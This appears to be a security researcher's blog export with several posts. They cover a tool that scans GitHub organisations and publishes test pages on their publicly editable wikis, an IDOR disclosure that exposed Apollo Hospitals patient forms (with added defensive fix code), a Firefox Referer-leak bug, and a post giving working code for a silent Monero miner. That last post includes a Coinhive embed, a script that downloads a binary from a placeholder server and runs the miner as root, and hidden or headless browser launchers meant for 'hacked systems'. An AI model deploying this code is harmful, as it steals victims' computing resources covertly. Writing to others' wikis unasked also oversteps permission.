I wrote a simple tool in Python using Selenium that takes an organization's GitHub username as input, iterates through all the repositories under that organization to find publicly editable wikis, publishes a sample wiki page on each one found, and returns the page URL.<br />
<br />
The code is on my GitHub:<br />
<a href="https://github.com/Shashank-In/VulEdiWi">https://github.com/Shashank-In/VulEdiWi</a><br />
<br />
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/-fpSCtjE34o" width="560"></iframe><br />
<br />
<br />
I scanned popular organizations' GitHub accounts, with the following results:<br />
<br />
<b>Google (https://github.com/google)</b><br />
<br />
<b>168 out of 1420 repositories had publicly editable wikis.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-_cC-QXrUuKU/XGMqZozGM9I/AAAAAAAAEUE/-KWexbMQkscOIR67l-S7dvMgQpP7MTMtACLcBGAs/s1600/Screenshot%2B2019-02-13%2Bat%2B01.49.26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="784" data-original-width="1404" height="356" src="https://2.bp.blogspot.com/-_cC-QXrUuKU/XGMqZozGM9I/AAAAAAAAEUE/-KWexbMQkscOIR67l-S7dvMgQpP7MTMtACLcBGAs/s640/Screenshot%2B2019-02-13%2Bat%2B01.49.26.png" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-LaLf9ke6TD0/XGMvSzXJNXI/AAAAAAAAEUk/x6FxS_efBN0Tl2ru4Hy9ORjl4r5dal-zACLcBGAs/s1600/Screenshot%2B2019-02-13%2Bat%2B02.10.13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="775" data-original-width="1600" height="308" src="https://3.bp.blogspot.com/-LaLf9ke6TD0/XGMvSzXJNXI/AAAAAAAAEUk/x6FxS_efBN0Tl2ru4Hy9ORjl4r5dal-zACLcBGAs/s640/Screenshot%2B2019-02-13%2Bat%2B02.10.13.png" width="640" /></a></div>
<br />
<br />
<b>Facebook (https://github.com/facebook)</b><br />
<b>1 out of 162 repositories had publicly editable wikis.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-9QdekxVZjQE/XGMr2LqnkXI/AAAAAAAAEUY/tNwucifdvAArGp_3c5WFDjno8YEhVm40QCLcBGAs/s1600/Screenshot%2B2019-02-13%2Bat%2B01.55.30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="945" data-original-width="1600" height="378" src="https://1.bp.blogspot.com/-9QdekxVZjQE/XGMr2LqnkXI/AAAAAAAAEUY/tNwucifdvAArGp_3c5WFDjno8YEhVm40QCLcBGAs/s640/Screenshot%2B2019-02-13%2Bat%2B01.55.30.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<b>Alibaba (https://github.com/alibaba)</b><br />
<b>38 out of 246 repositories had publicly editable wikis.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-h8vTUk0gdqQ/XGMwDfW8-tI/AAAAAAAAEUs/9nnhlnAqSF4LSGySObuZ1w6sCu8KrJvrQCLcBGAs/s1600/Screenshot%2B2019-02-13%2Bat%2B02.01.40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="968" data-original-width="1600" height="386" src="https://2.bp.blogspot.com/-h8vTUk0gdqQ/XGMwDfW8-tI/AAAAAAAAEUs/9nnhlnAqSF4LSGySObuZ1w6sCu8KrJvrQCLcBGAs/s640/Screenshot%2B2019-02-13%2Bat%2B02.01.40.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<b>Microsoft (https://github.com/Microsoft)</b><br />
<b>364 out of 2251 repositories had publicly editable wikis.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-6EBJc0MEz70/XG8PUJyObFI/AAAAAAAAEVk/EYFOkH-7lXU66s8umG9sLU2HNcfGsEmSACLcBGAs/s1600/Screenshot%2B2019-02-22%2Bat%2B02.20.38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1010" data-original-width="1600" height="402" src="https://4.bp.blogspot.com/-6EBJc0MEz70/XG8PUJyObFI/AAAAAAAAEVk/EYFOkH-7lXU66s8umG9sLU2HNcfGsEmSACLcBGAs/s640/Screenshot%2B2019-02-22%2Bat%2B02.20.38.png" width="640" /></a></div>
<br />
<br />
<b>Mozilla (https://github.com/mozilla)</b><br />
<b>792 out of 1960 repositories had publicly editable wikis.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Ayl7d5kP55c/XG8Q4Xhb6MI/AAAAAAAAEVw/5SCRxKr0cREAI1AmDtaF8PuHV-3zw23IwCLcBGAs/s1600/Screenshot%2B2019-02-22%2Bat%2B02.27.52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="493" data-original-width="1600" height="196" src="https://3.bp.blogspot.com/-Ayl7d5kP55c/XG8Q4Xhb6MI/AAAAAAAAEVw/5SCRxKr0cREAI1AmDtaF8PuHV-3zw23IwCLcBGAs/s640/Screenshot%2B2019-02-22%2Bat%2B02.27.52.png" width="640" /></a></div>
</div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com2tag:blogger.com,1999:blog-499911195830393683.post-72025452564120968562018-03-17T03:44:00.003+05:302019-08-17T15:07:21.421+05:30How Apollo Hospitals leaked 1 million customer details<div dir="ltr" style="text-align: left;" trbidi="on">
About Apollo Hospitals:-<br />
<br />
In 2015, Apollo Hospitals introduced its digital platform, Ask Apollo. The platform provides remote healthcare services: it connects patients with doctors remotely and offers services like consultations with doctors via video, voice calls, and email. Apollo developed the platform in partnership with the Hyderabad-based emergency and healthcare management services firm HealthNet Global and with Vidyo.<br />
source: Wikipedia<br />
<br />
I stumbled on this bug while booking a dental appointment with Apollo Hospitals. The bug was leaking the details of 1 MILLION customers who had booked an appointment online with Apollo Hospitals.<br />
<br />
Since they are a big company, I thought it was my moral responsibility to help them get it fixed. But unfortunately, they never replied to my emails.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-H0k8Hc8W6Kc/Wqw5zSnOe6I/AAAAAAAADy8/xDPb46uzhBUnrNhljFFc3GWpThJyqJTxQCLcBGAs/s1600/Screen%2BShot%2B2018-03-17%2Bat%2B3.08.20%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="548" data-original-width="1446" height="242" src="https://2.bp.blogspot.com/-H0k8Hc8W6Kc/Wqw5zSnOe6I/AAAAAAAADy8/xDPb46uzhBUnrNhljFFc3GWpThJyqJTxQCLcBGAs/s640/Screen%2BShot%2B2018-03-17%2Bat%2B3.08.20%2BAM.png" width="640" /></a></div>
<br />
<br />
Then one day I heard of a nice guy named Elliot, who had privately disclosed a lot of vulnerabilities to Indian companies and helped them get patched. So I asked him if he could contact Apollo, because he had a better chance of getting a response.<br />
<br />
And that worked. I am glad that Apollo patched the vulnerability. But I wish that, like other companies, they had a responsible disclosure program through which anyone could help them fix security issues in an ethical manner.<br />
<br />
Details of the security issue:-<br />
<br />
Apollo Hospitals has an online appointment booking portal, "www.askapollo.com".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-0SltCC0iKwQ/WqWlwaAPPYI/AAAAAAAADyI/oS_JD6hpBKEsTEXBpZggEncG1WSiE9wIQCLcBGAs/s1600/Screen%2BShot%2B2018-03-12%2Bat%2B3.24.31%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="1600" height="297" src="https://2.bp.blogspot.com/-0SltCC0iKwQ/WqWlwaAPPYI/AAAAAAAADyI/oS_JD6hpBKEsTEXBpZggEncG1WSiE9wIQCLcBGAs/s640/Screen%2BShot%2B2018-03-12%2Bat%2B3.24.31%2BAM.png" width="640" /></a></div>
<br />
<br />
When we sign up, we get our profile created.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-CTfVGnEy59g/WqWmqs7h7EI/AAAAAAAADyQ/rszlzfKjeZAMKQwcwJYDoVTnvEnOR_trQCLcBGAs/s1600/Screen%2BShot%2B2018-03-12%2Bat%2B3.26.40%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="805" data-original-width="1600" height="322" src="https://1.bp.blogspot.com/-CTfVGnEy59g/WqWmqs7h7EI/AAAAAAAADyQ/rszlzfKjeZAMKQwcwJYDoVTnvEnOR_trQCLcBGAs/s640/Screen%2BShot%2B2018-03-12%2Bat%2B3.26.40%2BAM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
There is also an option to print the IPR form. When I clicked on it, I got my IPR form auto-filled.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-_5EtZnwGQDQ/WqWnkB9OCiI/AAAAAAAADyc/E2PByUxY7qMVcIvxZgzeAAoO_vVIW91SgCLcBGAs/s1600/Screen%2BShot%2B2018-03-12%2Bat%2B3.30.53%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="983" data-original-width="1600" height="392" src="https://1.bp.blogspot.com/-_5EtZnwGQDQ/WqWnkB9OCiI/AAAAAAAADyc/E2PByUxY7qMVcIvxZgzeAAoO_vVIW91SgCLcBGAs/s640/Screen%2BShot%2B2018-03-12%2Bat%2B3.30.53%2BAM.png" width="640" /></a></div>
<br />
The autofill request made me suspicious, so I looked at what was going on in the background.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-LMv1T43t5NQ/WqWn62M7uyI/AAAAAAAADyg/nza_F8VqJNAl7S38CtGGHb_jSMnm1C6owCLcBGAs/s1600/Screen%2BShot%2B2018-03-12%2Bat%2B3.34.05%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="346" data-original-width="1600" height="138" src="https://1.bp.blogspot.com/-LMv1T43t5NQ/WqWn62M7uyI/AAAAAAAADyg/nza_F8VqJNAl7S38CtGGHb_jSMnm1C6owCLcBGAs/s640/Screen%2BShot%2B2018-03-12%2Bat%2B3.34.05%2BAM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
So the URL was<br />
"<a href="https://www.askapollo.com/physical-appointment/PrintIPRForm.aspx?hashKey=1153433">https://www.askapollo.com/physical-appointment/PrintIPRForm.aspx?hashKey=11534</a>XX"<br />
<br />
Unfortunately the hash key was not a hash at all; it was a plain sequential number. I tried decrementing the sequential ID and, voilà, an IDOR: I could see other people's IPR forms, which contained sensitive information such as<br />
Name<br />
Address<br />
DOB<br />
Phone number<br />
Email etc.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-FHGmUDNsZUg/WqWoyR3yiUI/AAAAAAAADyo/Q7H7pyJTkJYXCOSuNAMOaojBvQmSc1ezgCLcBGAs/s1600/Screen%2BShot%2B2018-03-12%2Bat%2B3.36.47%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="928" data-original-width="1600" height="370" src="https://2.bp.blogspot.com/-FHGmUDNsZUg/WqWoyR3yiUI/AAAAAAAADyo/Q7H7pyJTkJYXCOSuNAMOaojBvQmSc1ezgCLcBGAs/s640/Screen%2BShot%2B2018-03-12%2Bat%2B3.36.47%2BAM.png" width="640" /></a></div>
<br />
<br />
My sequential ID was 11534XX (7 digits), so the details of around 1 million users could have been leaked had this fallen into the wrong hands.<br />
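<br />
To make the fix concrete, here is an added example (not code from the post or from askapollo.com): an in-memory model of the PrintIPRForm lookup as the post describes it, where any sequential hashKey returns any patient's form, next to a version that checks ownership and turns hashKey into a real keyed hash. The function names, the patient records and the HMAC scheme are assumptions; the ids only echo the redacted 11534XX range.<br />

```python
"""Added example, not askapollo.com's code: an in-memory model of the
PrintIPRForm lookup as the post describes it (any sequential hashKey
returns any patient's form), next to a version with the two controls a
reviewer would demand.  Function names and patient records are constructed;
the ids echo the post's redacted 11534XX range."""
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)   # per-deployment key (assumed)

# Constructed records, keyed by the sequential database id.
IPR_FORMS = {
    1153431: {"owner": "alice", "name": "Alice A.", "dob": "1990-01-01"},
    1153432: {"owner": "bob",   "name": "Bob B.",   "dob": "1985-05-05"},
    1153433: {"owner": "carol", "name": "Carol C.", "dob": "1978-09-09"},
}


def print_ipr_form_vulnerable(session_user, hash_key):
    """The bug: 'hashKey' is just the row id and ownership is never checked."""
    form = IPR_FORMS.get(int(hash_key))
    return (200, form) if form else (404, None)


def _mac(form_id):
    """Keyed hash of the id; adjacent ids share nothing an attacker can predict."""
    return hmac.new(SERVER_SECRET, str(form_id).encode(),
                    hashlib.sha256).hexdigest()[:32]


def form_reference(form_id):
    """What a real hashKey should look like: '<id>.<hmac>'."""
    return f"{form_id}.{_mac(form_id)}"


def print_ipr_form_fixed(session_user, reference):
    """Fix: verify the keyed reference, then verify ownership.  Both failures
    return 404 so the response does not even confirm that the id exists."""
    form_id_str, _, mac = reference.partition(".")
    try:
        form_id = int(form_id_str)
        valid = hmac.compare_digest(_mac(form_id), mac)
    except (ValueError, TypeError):   # non-numeric id, non-ASCII mac
        return 404, None
    form = IPR_FORMS.get(form_id)
    if not valid or form is None or form["owner"] != session_user:
        return 404, None
    return 200, form


def enumerate_ids(handler, session_user, start, count):
    """What the post did: walk sequential ids and keep the 200 responses."""
    hits = []
    for form_id in range(start, start + count):
        status, form = handler(session_user, str(form_id))
        if status == 200:
            hits.append((form_id, form["name"]))
    return hits
```

Note that the keyed reference alone is not the fix: a leaked or forwarded link would still work for anyone holding it, so the ownership check is what actually closes the IDOR, and the HMAC only stops enumeration of ids the user never had a link for. Returning 404 for both failures keeps the endpoint from confirming which ids exist.<br />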
<br />
I would like to thank Elliot again for creating awareness among Indian companies about the importance of security when everything is getting online.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-nR0x0FRQ7_A/Wqw83esbKoI/AAAAAAAADzI/AFjgEe1JH4kw9n42P8BFOsGJy0CVW1pUwCLcBGAs/s1600/Screen%2BShot%2B2018-03-17%2Bat%2B3.22.51%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="952" data-original-width="1288" height="472" src="https://2.bp.blogspot.com/-nR0x0FRQ7_A/Wqw83esbKoI/AAAAAAAADzI/AFjgEe1JH4kw9n42P8BFOsGJy0CVW1pUwCLcBGAs/s640/Screen%2BShot%2B2018-03-17%2Bat%2B3.22.51%2BAM.png" width="640" /></a></div>
<br />
<br />
<br />
Final words<br />
<br />
We talk about Digital India, but we are lacking very basic security measures almost everywhere. As we go more and more digital, it is essential that companies handle their customers' data securely, and one of the best ways to do that is to have a responsible disclosure program.<br />
<br />
A responsible disclosure policy is the first step in protecting your company from an attack or a premature public vulnerability release. The best part is that they aren't hard to set up, and they give your team peace of mind when a researcher discovers a vulnerability. Getting started with responsible disclosure simply requires a security page that states –<br />
<br />
What parts or sections of a site are within testing scope.<br />
The types of bugs and vulns that are valid for submission.<br />
A dedicated security email address to report the issue (often security@example.com).<br />
<br />
https://www.bugcrowd.com/resource/what-is-responsible-disclosure/ (For more details)<br />
<br />
If we look at countries like the USA, their Air Force, Pentagon and defense websites have also adopted responsible disclosure programs. These actions, and the understanding behind them, put the USA ahead of India.<br />
Example is here<br />
https://hackerone.com/htaf2<br />
<br />
If we look at the facts and figures, Indians have received the highest amount of rewards from facebook.com's bug bounty program, which rewards ethical hackers for finding and reporting security vulnerabilities on Facebook's website. This means we do have the resources, but we are neglecting them.<br />
<br />
~Source<br />
https://www.facebook.com/notes/facebook-bug-bounty/facebook-bug-bounty-5-million-paid-in-5-years/1419385021409053/<br />
<br />
Another source<br />
<br />
https://economictimes.indiatimes.com/tech/internet/bsnl-isro-cases-show-india-not-a-country-for-ethical-hackers/articleshow/63278882.cms?from=mdr<br />
<br />
Indian companies need to be more open towards ethical hackers rather than being orthodox. Blogging about this bug was not to shame anyone; it's to spread awareness that we have to take security seriously, which is highly neglected in India.<br />
<br />
Let's make the Internet a safer place :)<br />
<br />
<br />
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com4tag:blogger.com,1999:blog-499911195830393683.post-52783956412397090912018-02-01T21:08:00.000+05:302019-08-17T15:14:36.061+05:30Firefox quantum browser referer leakage bug <div dir="ltr" style="text-align: left;" trbidi="on">
This is one of the security issues I found while investigating another security bug. It was a bug in Firefox Quantum (v56 and above) that could leak sensitive URLs through the Referer header.<br />
<br />
I would like to explain this bug in detail!<br />
<br />
<b>What are referer headers?</b><br />
<b><br /></b> The Referer request-header contains the address of the previous web page from which a link to the currently requested page was followed. The Referer header allows servers to identify where people are visiting them from and may use that data for analytics, logging, or optimized caching, etc.<br />
<br />
source (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer)<br />
<br />
So in simple words, as we move from one web page to another, the next request carries a Referer header with the URL of the previous page.<br />
<br />
Yes, it's spelled "Referer". Someone misspelled "referrer" in the original HTTP specification (RFC 1945), and we have been carrying it forward ever since for compatibility :)<br />
<br />
<b>Abuse of referer headers!</b><br />
<br />
But this functionality becomes a security issue in certain places.<br />
<br />
For a modern web app it is very common to have a password reset feature, which emails you a link with a password reset token that lets you set a new password. The URL will be something like<br />
<br />
https://www.somewebsite.com/passreset?token=thetoken<br />
<br />
It is also very common for a modern web app to load images from a CDN or external JavaScript files, and to carry external links in the page footer, on the very page the password reset link opens. When those resources are fetched, or an external link is clicked, the Referer header is carried along:<br />
<br />
https://www.somewebsite.com/passreset?token=thetoken<br />
<br />
Hence it leaks your password reset token, or perhaps session tokens, etc. to an external website.<br />
<br />
So one of your third parties might be collecting all your users' password reset tokens in their logs.<br />
Bad right?<br />
<br />
<b>The fix:- </b><br />
<b><br /></b> The HTML link attribute<br />
<b><br /></b> <b>rel="noopener noreferrer" </b><br />
<br />
instructs the browser not to send a Referer header when the external link is clicked. Strictly speaking, <b>noreferrer</b> is the part that suppresses the Referer (and it implies <b>noopener</b>); <b>noopener</b> stops the opened page from reaching back into yours through <b>window.opener</b>.<br />
<br />
So if your website has a footer that links to, say, "shashank.co", and as the website owner you do not want your users' Referer header leaked to "shashank.co", you do this:<br />
<br />
<blockquote class="tr_bq">
<b><a href="https://www.shashank.co" target="_blank" rel="noopener noreferrer">shashank.co</a></b></blockquote>
<br />
The above code fixes the leak for that link. It does nothing for subresources such as CDN images and scripts, which have no rel attribute; for those you need a page-wide policy, set with the Referrer-Policy response header or a <b>meta name="referrer"</b> tag on the reset page.<br />
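<br />
How much of the reset URL leaks depends on the referrer policy in force for the page and on the link's rel attribute. The function below is an added example (not from the post or from Firefox): it implements the policy table from the W3C Referrer Policy specification and returns the Referer a browser sends when a page at one URL requests another. The reset URL is the post's own example; the CDN and tracker hosts are made up.<br />

```python
"""Added example, not from the post: which Referer a browser sends for a
navigation or a subresource load, computed from the page URL, the target
URL, the page's referrer policy and the link's rel attribute.  The policy
branches follow the W3C Referrer Policy table; the password-reset URL is
the post's, the CDN and tracker hosts are made-up examples."""
from urllib.parse import urlsplit, urlunsplit

# Browser defaults: the first applied in 2018 (when the post was written),
# the second is what Chrome and Firefox have shipped since 2020/2021.
LEGACY_DEFAULT = "no-referrer-when-downgrade"
MODERN_DEFAULT = "strict-origin-when-cross-origin"

RESET_URL = "https://www.somewebsite.com/passreset?token=thetoken"


def _origin(url):
    """scheme://host[:port] with the default port and any userinfo dropped."""
    p = urlsplit(url)
    default_port = {"https": 443, "http": 80}.get(p.scheme)
    port = "" if p.port in (None, default_port) else f":{p.port}"
    return f"{p.scheme}://{p.hostname or ''}{port}"


def _strip_for_referrer(url):
    """'Strip url for use as a referrer': remove credentials and fragment."""
    p = urlsplit(url)
    netloc = _origin(url).split("://", 1)[1]
    return urlunsplit((p.scheme, netloc, p.path or "/", p.query, ""))


def referer_for(page_url, target_url, policy=LEGACY_DEFAULT, rel=()):
    """Return the Referer value sent when page_url requests target_url,
    or None when the browser sends no Referer at all."""
    if "noreferrer" in rel:              # rel="noreferrer" wins over any policy
        return None
    same_origin = _origin(page_url) == _origin(target_url)
    downgrade = (urlsplit(page_url).scheme == "https"
                 and urlsplit(target_url).scheme == "http")
    full = _strip_for_referrer(page_url)
    origin_only = _origin(page_url) + "/"

    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return full
    if policy == "origin":
        return origin_only
    if policy == "same-origin":
        return full if same_origin else None
    if policy == "strict-origin":
        return None if downgrade else origin_only
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else full
    if policy == "origin-when-cross-origin":
        return full if same_origin else origin_only
    if policy == "strict-origin-when-cross-origin":
        if same_origin:
            return full
        return None if downgrade else origin_only
    raise ValueError(f"unknown referrer policy: {policy!r}")
```

Under the default that browsers applied when this post was written, the full token leaks to any https third party; rel="noreferrer" removes it for that one link, while a page-wide strict-origin-when-cross-origin (the default Chrome and Firefox ship today) cuts every cross-origin Referer, subresources included, down to the bare origin.<br />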
<br />
<br />
Now, Firefox Quantum was failing to act on <b>rel="noopener noreferrer" </b>and was still sending Referer headers to external links.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-dRItJuK5X1M/WnI_OD-fU7I/AAAAAAAADtM/MSt-jesUTR4fmdTz5mW8KZZR6pH3m_VmACLcBGAs/s1600/quantumbug.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="874" data-original-width="1600" height="347" src="https://2.bp.blogspot.com/-dRItJuK5X1M/WnI_OD-fU7I/AAAAAAAADtM/MSt-jesUTR4fmdTz5mW8KZZR6pH3m_VmACLcBGAs/s640/quantumbug.png" width="640" /></a></div>
<br />
<br />
I reported this bug. Unfortunately, it was a duplicate of a similar report, which described the problem for pinned tabs. I still have no idea how someone spotted it for pinned tabs when it was also broken for normal tabs with external links.<br />
<br />
This bug has been fixed in Firefox v59 (Beta).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-yo5JQEDbMnw/WnJAH0w244I/AAAAAAAADtQ/7VVxAwhSBjsNFIXCUlwYIHpkxj37TI8rgCEwYBhgL/s1600/Screen%2BShot%2B2018-02-01%2Bat%2B3.45.31%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="954" data-original-width="1478" height="413" src="https://2.bp.blogspot.com/-yo5JQEDbMnw/WnJAH0w244I/AAAAAAAADtQ/7VVxAwhSBjsNFIXCUlwYIHpkxj37TI8rgCEwYBhgL/s640/Screen%2BShot%2B2018-02-01%2Bat%2B3.45.31%2BAM.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-23380986238721491842018-01-13T04:55:00.000+05:302019-08-17T15:21:28.937+05:30Writing a silent cryptocurrency miner (Monero) in 6 lines of code<div dir="ltr" style="text-align: left;" trbidi="on">
Hidden cryptocurrency mining has long been a game black-hat hackers play to make money. After reading a lot of blogs and news about hackers injecting silent miners into hacked computers, servers and websites, I thought of playing with it myself.<br />
<br />
<b><i>Note: this blog is just for awareness of hidden cryptocurrency miners. I am not responsible for what my readers do with my code, and I never suggest anyone deploy cryptocurrency miners on unauthorized computers. </i></b><br />
<br />
<b>Lets first understand what mining is?</b><br />
<br />
Cryptocurrency mining serves two functions: adding transactions to the blockchain (securing and verifying them) and releasing new currency. Every block a miner adds must carry a proof-of-work (PoW).<br />
Mining needs a computer and a special program (provided by the coin's developer community) with which miners compete with their peers to solve a hard puzzle: hashing the candidate block, with its transaction data, over and over with a cryptographic hash function until the result falls under the current difficulty target. This eats huge amounts of computing resources.<br />
<br />
Now, we already know that Bitcoin transactions are traceable: hard, but still possible. So, in recent trends, I found that most black-hat hackers have shifted to Monero mining. When I heard about Monero in the news, I wanted to figure out: why Monero?<br />
<br />
<b>The reasons are:-</b><br />
<br />
1) Monero is a private, untraceable cryptocurrency.<br />
<br />
But this doesn't fully answer the question, because there are other privacy-focused cryptocurrencies too, like Zcash, Dash (earlier known as Darkcoin), Verge, etc.<br />
<br />
After a bit more research, I found my answer.<br />
<br />
2) Monero uses the CryptoNight proof-of-work from the CryptoNote protocol, which is memory-hard and designed to resist ASIC miners, so mining is done on ordinary CPUs and GPUs. That does not make mining "easier" in absolute terms, but it means a regular consumer laptop or PC still earns a meaningful share of the reward, which it never could against Bitcoin's ASIC farms.<br />
<br />
This makes CPU mining feasible for ordinary users, and a golden opportunity for hackers to mass-mine Monero on hacked computers as a botnet.<br />
<br />
Next question was how simple can this be?<br />
Let's learn it by doing it!<br />
<br />
<b>Building a Monero Miner Linux (Ubuntu for example):-</b><br />
<br />
Note:- I am a horrible coder. Hence I try to keep my code easy, with as few lines and as little complexity as possible, no matter how horrible the code is. I am fine if it works :)<br />
<br />
<b>Preparing a list, how to make a silent miner!</b><br />
<br />
1) A reliable miner manager.<br />
2) Make it run invisible/silently on a system.<br />
<br />
The best miner I could find was a JavaScript one, created by "https://coinhive.com/". It was free to sign up, and they took a 30% commission for using their miner. (Coinhive shut down in March 2019, so the embed below no longer mines anything; the technique is what matters here.)<br />
<br />
But this is a browser-based miner. To run it on a hacked system we need to fire it up in the system's browser, and invisibly at that.<br />
<br />
As far as I knew, Selenium is what you use for browser automation.<br />
<br />
Now we just embed the JavaScript snippet from Coinhive, with our public site key, to trigger the miner.<br />
<br />
<b>Code file.html</b><br />
<br />
<blockquote class="tr_bq">
<HTML><br />
<head><br />
<span style="white-space: pre;"> </span><title>Test</title><br />
</head><br />
<body><br />
<script src="https://coinhive.com/lib/coinhive.min.js"></script><br />
<script><br />
<span style="white-space: pre;"> </span>var miner = new CoinHive.Anonymous('3yvOKgHxX9ZsPB9x78IjhQ1C4xCDDhJx');<br />
<span style="white-space: pre;"> </span>miner.start();<br />
</script><br />
</body><br />
</HTML></blockquote>
<br />
<br />
<br />
The next step is to open the HTML file silently in the system's browser. So we host our file somewhere and make Selenium open the URL.<br />
<br />
First, we need to install dependencies. I wrote a script that installs all the dependencies in one go.<br />
<br />
<b>Code script.py</b><br />
<blockquote class="tr_bq">
<br />
import os<br />
os.system("apt-get -y install python3-pip")<br />
os.system("pip3 install selenium")<br />
os.system("pip3 install pyvirtualdisplay")<br />
os.system("apt-get -y install firefox xvfb")<br />
os.system("wget http://yourwebsite.com/geckodriver")<br />
os.system("mv geckodriver /usr/local/bin")<br />
os.system("chmod 755 /usr/local/bin/geckodriver")<br />
os.system("sudo python3 selenium_miner.py") </blockquote>
<br />
Understanding the code:-<br />
So we are installing pyvirtualdisplay, a Python wrapper around Xvfb (a virtual X display, so that Firefox has a screen to render to without anything appearing on the real one),<br />
Selenium, which is required for browser automation,<br />
and geckodriver, which Selenium needs to launch and drive Firefox.<br />
<br />
Gecko driver for Linux can be downloaded from here<br />
<br />
"https://github.com/mozilla/geckodriver/releases"<br />
<br />
When we unzip the downloaded archive we get the geckodriver binary. The wget line just fetches that unzipped binary from my own server.<br />
<br />
The mv line moves it into /usr/local/bin, so that I don't have to mention the path of geckodriver in my further code.<br />
<br />
The last line finally calls the miner file to run, whose code is below.<br />
<br />
<br />
<b>Code selenium_miner.py</b><br />
<br />
<blockquote class="tr_bq">
from pyvirtualdisplay import Display<br />
from selenium import webdriver<br />
display = Display(visible=0, size=(1024, 768))<br />
display.start()<br />
browser = webdriver.Firefox()<br />
browser.get('http://www.yourwebsite.com/file.html')</blockquote>
<br />
<br />
<br />
This code simply makes the display invisible and opens the URL where the miner is hosted (our file.html). Since I never quit Selenium, the HTML file stays open in a hidden Firefox for as long as the system is running, and the JavaScript in it uses the system's CPU to mine Monero.<br />
<br />
<b>Windows miner:-</b><br />
<br />
There are two ways of doing it.<br />
Since pyvirtualdisplay (Xvfb) is not available on Windows, I had to look for an alternative.<br />
<br />
I found that PhantomJS provides a headless browser for Windows.<br />
<br />
<b>Code windows_miner1.py</b><br />
<br />
<blockquote class="tr_bq">
from selenium import webdriver<br />
path="C:\\Python27\\python\\phantom\\bin\\phantomjs.exe"<br />
browser = webdriver.PhantomJS(path)<br />
browser.get('http://www.yourwebsite.com/file.html')</blockquote>
<br />
<br />
In the code above, the path variable holds the location of your PhantomJS executable, which can be downloaded from here (note that Selenium deprecated PhantomJS support in 3.8 and removed it in 4.0, so the headless Chrome approach further down is the one that still works)<br />
<br />
"http://phantomjs.org/download.html"<br />
<br />
In the bin folder, there is a phantomjs.exe. That path is to be mentioned in the variable.<br />
<br />
<br />
This was my first approach, but then I went for a more straightforward one. While browsing the internet, I found that Chrome had shipped a headless mode. That's all we need :)<br />
<b><br /></b> <b>Code windows_miner2.py</b><br />
<br />
<blockquote class="tr_bq">
import os<br />
import subprocess<br />
# Portable Chrome (Gchrome.exe) in the current directory, or the full path to chrome.exe<br />
chrome = os.path.join(os.getcwd(), "Gchrome.exe")<br />
subprocess.Popen([chrome, "--headless", "--disable-gpu",<br />
<span style="white-space: pre;"> </span>"--remote-debugging-port=9222",<br />
<span style="white-space: pre;"> </span>"http://www.yourwebsite.com/file.html"])</blockquote>
<br />
